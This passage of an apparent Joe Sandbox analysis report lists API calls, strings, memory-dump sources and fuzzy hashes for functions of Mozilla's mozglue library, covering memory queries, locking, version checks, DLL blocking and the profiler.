                                                                                                                                                          • Part of subcall function 6B089B80: __Init_thread_footer.LIBCMT ref: 6B089BDB
                                                                                                                                                        • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6B0803D4,?), ref: 6B0DB955
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6B0DB9A5
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6B0DBA20
                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 6B0DBA7B
                                                                                                                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6B0DBA81
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6B0DBA86
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1753913139-0
                                                                                                                                                        • Opcode ID: 8b7886fd93deccc25df86a396313cd78ae59e190b7e03f522fe397e15a0b3a85
                                                                                                                                                        • Instruction ID: 4bad9bbb0669e3adf4002dc961358407b9e19bc204576614ff30145e50439d75
                                                                                                                                                        • Opcode Fuzzy Hash: 8b7886fd93deccc25df86a396313cd78ae59e190b7e03f522fe397e15a0b3a85
                                                                                                                                                        • Instruction Fuzzy Hash: 1E514B75E01219DFDF18CFA8D981BDDBFB6AF88314F144169E905B7284DB38AD418B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0AFA80: GetCurrentThreadId.KERNEL32 ref: 6B0AFA8D
                                                                                                                                                          • Part of subcall function 6B0AFA80: AcquireSRWLockExclusive.KERNEL32(6B0FF448), ref: 6B0AFA99
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8BD5
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8C3A
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8C74
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8CBA
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0B8CCF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2153970598-0
                                                                                                                                                        • Opcode ID: f9c932c6b677490d34b9e7280062a149b25e11b87bc579a61f560f1de960e297
                                                                                                                                                        • Instruction ID: 35df320fba45c101c4e3a5fa6771ab3030a6eac61739e88e7711138107ee17d0
                                                                                                                                                        • Opcode Fuzzy Hash: f9c932c6b677490d34b9e7280062a149b25e11b87bc579a61f560f1de960e297
                                                                                                                                                        • Instruction Fuzzy Hash: 72718E75A14B018FD708CF29C48071ABBF1FF99314F459A9DE9899B362E775E880CB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6B07F2B4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6B07F2F0
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6B07F308
                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 6B07F36B
                                                                                                                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6B07F371
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1171715205-0
                                                                                                                                                        • Opcode ID: db6b17b976e297fa0663825b0130c9509c4670725ee0483681753bf35c921b8a
                                                                                                                                                        • Instruction ID: 3027a16227c55e2d88d48a47ff430957b8137c5d986ae7c5ed28b3a6777258f3
                                                                                                                                                        • Opcode Fuzzy Hash: db6b17b976e297fa0663825b0130c9509c4670725ee0483681753bf35c921b8a
                                                                                                                                                        • Instruction Fuzzy Hash: BC218170A00288EFEB38AA60DD95BEEBFFCBB45358F004279E52096190D7789984C775
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6B0E86AE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                        • Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                                                                                                        • Instruction ID: a4a4de2ce07d8e257b59f1db9ba45e76985287c09fe8e1c691cf953ac9ec953a
                                                                                                                                                        • Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                                                                                                        • Instruction Fuzzy Hash: 22C1B976E0011A8FDB18CF68CC91BDDBBB2EF85314F1502A9C549EB355D734A986CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6B0E8E18
                                                                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6B0E925C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                        • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                        • Instruction ID: 4f627bfe83f9815e171768cbce67b56c0ec35c9913e48d12e47674b8ba1ccf34
                                                                                                                                                        • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                        • Instruction Fuzzy Hash: DAA1D776E002168FDB18CF68CC817DDBBB2AF85314F1502B9C949DB395D734A996CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6B0DB720
                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 6B0DB75A
                                                                                                                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6B0AFE3F,00000000,00000000,?,?,00000000,?,6B0AFE3F), ref: 6B0DB760
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 304294125-0
                                                                                                                                                        • Opcode ID: 91c0a721990e6d101b69d93d323eddf9a5daa862cecbe66a6be458a95fb989f1
                                                                                                                                                        • Instruction ID: 99a726929385d95446c5fb960c65a349920fdc6d9d962e7c1def1d1083a6f543
                                                                                                                                                        • Opcode Fuzzy Hash: 91c0a721990e6d101b69d93d323eddf9a5daa862cecbe66a6be458a95fb989f1
                                                                                                                                                        • Instruction Fuzzy Hash: 56F0AFB0A0430CAFEF199AA0CC85BEE7FBD9B04319F008169E511620C0D77995C8C661
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6B0803D4,?), ref: 6B0DB955
                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6B0DB9A5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1889792194-0
                                                                                                                                                        • Opcode ID: 39bebf65eab5bc9235cf3acfbc18d6fa50f0de3d3cda9632356a6a9fd5867864
                                                                                                                                                        • Instruction ID: 5064afb9b2adbd6878eeb7c5fe43d02bf7221d1d3c8f139007fb909d7c6baaa7
                                                                                                                                                        • Opcode Fuzzy Hash: 39bebf65eab5bc9235cf3acfbc18d6fa50f0de3d3cda9632356a6a9fd5867864
                                                                                                                                                        • Instruction Fuzzy Hash: 5F41B171E003199FDF08CFA8D891BDEBFB6EF88314F10816AE905A7344DB35A8458B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF760), ref: 6B0819BD
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6B0819E5
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B081A27
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6B081A41
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6B081A4F
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B081A92
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6B081AAC
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6B081ABA
                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 6B081C69
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B081C8F
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B081C9D
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6B081CAE
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF760), ref: 6B081D52
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B081DA5
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B081DFB
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B081E49
                                                                                                                                                        • GetLastError.KERNEL32 ref: 6B081E68
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B081E9B
                                                                                                                                                          • Part of subcall function 6B082070: LoadLibraryW.KERNEL32(combase.dll,6B081C5F), ref: 6B0820AE
                                                                                                                                                          • Part of subcall function 6B082070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6B0820CD
                                                                                                                                                          • Part of subcall function 6B082070: __Init_thread_footer.LIBCMT ref: 6B0820E1
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6B081F15
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B081F46
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B081F52
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B081F59
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B081F60
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B081F6D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                                                                                        • String ID: D
                                                                                                                                                        • API String ID: 290179723-2746444292
                                                                                                                                                        • Opcode ID: 4df52d7170dea7143475ec35f375cb14ec2a586ca00347f583e9c78af49b7f5a
                                                                                                                                                        • Instruction ID: 2da50e06035ee1d550fa5f8d3d832da3273e9f516c311afbc8fd2fd87915d3bc
                                                                                                                                                        • Opcode Fuzzy Hash: 4df52d7170dea7143475ec35f375cb14ec2a586ca00347f583e9c78af49b7f5a
                                                                                                                                                        • Instruction Fuzzy Hash: 83F15E71A00325AFEB249F65DC48B9ABFB9FF49704F014199E919A7240D778DA80CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • strchr.VCRUNTIME140(00000000,0000002E), ref: 6B09BC5A
                                                                                                                                                        • strchr.VCRUNTIME140(00000001,0000002E), ref: 6B09BC6E
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6B09BC9E
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6B09BE33
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BE65
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BE71
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BE7D
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BE89
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B09BE97
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6B09BEE4
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BF15
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BF21
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BF2D
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6B09BF39
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6B09BF47
                                                                                                                                                          • Part of subcall function 6B0DAAE0: GetCurrentThreadId.KERNEL32 ref: 6B0DAAF8
                                                                                                                                                          • Part of subcall function 6B0DAAE0: EnterCriticalSection.KERNEL32(6B0FF770,?,6B09BF9F), ref: 6B0DAB08
                                                                                                                                                          • Part of subcall function 6B0DAAE0: LeaveCriticalSection.KERNEL32(6B0FF770,?,?,?,?,?,?,?,?,6B09BF9F), ref: 6B0DAB6B
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B09BFF0
                                                                                                                                                        • _strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6B09C014
                                                                                                                                                          • Part of subcall function 6B0DAC20: CreateFileW.KERNEL32 ref: 6B0DAC52
                                                                                                                                                          • Part of subcall function 6B0DAC20: CreateFileMappingW.KERNEL32 ref: 6B0DAC7D
                                                                                                                                                          • Part of subcall function 6B0DAC20: GetSystemInfo.KERNEL32 ref: 6B0DAC98
                                                                                                                                                          • Part of subcall function 6B0DAC20: MapViewOfFile.KERNEL32 ref: 6B0DACB0
                                                                                                                                                          • Part of subcall function 6B0DAC20: GetSystemInfo.KERNEL32 ref: 6B0DACCD
                                                                                                                                                          • Part of subcall function 6B0DAC20: MapViewOfFile.KERNEL32 ref: 6B0DAD05
                                                                                                                                                          • Part of subcall function 6B0DAC20: UnmapViewOfFile.KERNEL32 ref: 6B0DAD1C
                                                                                                                                                          • Part of subcall function 6B0DAC20: CloseHandle.KERNEL32 ref: 6B0DAD28
                                                                                                                                                          • Part of subcall function 6B0DAC20: UnmapViewOfFile.KERNEL32 ref: 6B0DAD37
                                                                                                                                                          • Part of subcall function 6B0DAC20: CloseHandle.KERNEL32 ref: 6B0DAD43
                                                                                                                                                          • Part of subcall function 6B0DAE70: GetCurrentThreadId.KERNEL32 ref: 6B0DAE85
                                                                                                                                                          • Part of subcall function 6B0DAE70: EnterCriticalSection.KERNEL32(6B0FF770,?,6B09C034), ref: 6B0DAE96
                                                                                                                                                          • Part of subcall function 6B0DAE70: LeaveCriticalSection.KERNEL32(6B0FF770,?,?,?,?,6B09C034), ref: 6B0DAEBD
                                                                                                                                                        Strings
                                                                                                                                                        • LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6B09BDDD
                                                                                                                                                        • LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6B09BFCF
                                                                                                                                                        • accelerator.dll, xrefs: 6B09BC8E, 6B09BC9D
                                                                                                                                                        • LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6B09BF5B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
                                                                                                                                                        • String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
                                                                                                                                                        • API String ID: 3889411031-3373514183
                                                                                                                                                        • Opcode ID: 758904fb4c73b2817afb8a89c512c65e544b4c71e81403404585983e5ee64f9c
                                                                                                                                                        • Instruction ID: b76389fdb6ba3e1691f1396a7725a4c4d587210e067a199d1d2ce693a18cc45e
                                                                                                                                                        • Opcode Fuzzy Hash: 758904fb4c73b2817afb8a89c512c65e544b4c71e81403404585983e5ee64f9c
                                                                                                                                                        • Instruction Fuzzy Hash: 94E12B71A043009FE718EF24E885B6EBFE9EF85764F00491DE99587280EB78E845D792
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6B0BB9F1,?), ref: 6B0B7107
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6B0BDCF5), ref: 6B0BE92D
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEA4F
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEA5C
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEA80
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEA8A
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6B0BDCF5), ref: 6B0BEA92
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEB11
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB1E
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6B0BEB3C
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB5B
                                                                                                                                                          • Part of subcall function 6B0B5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6B0BEB71), ref: 6B0B57AB
                                                                                                                                                          • Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                          • Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEBA4
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6B0BEBAC
                                                                                                                                                          • Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
                                                                                                                                                          • Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEBC1
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8,?,?,00000000), ref: 6B0BEBCE
                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6B0BEBE5
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8,00000000), ref: 6B0BEC37
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6B0BEC46
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6B0BEC55
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B0BEC5C
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_start, xrefs: 6B0BEBB4
                                                                                                                                                        • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6B0BEA9B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
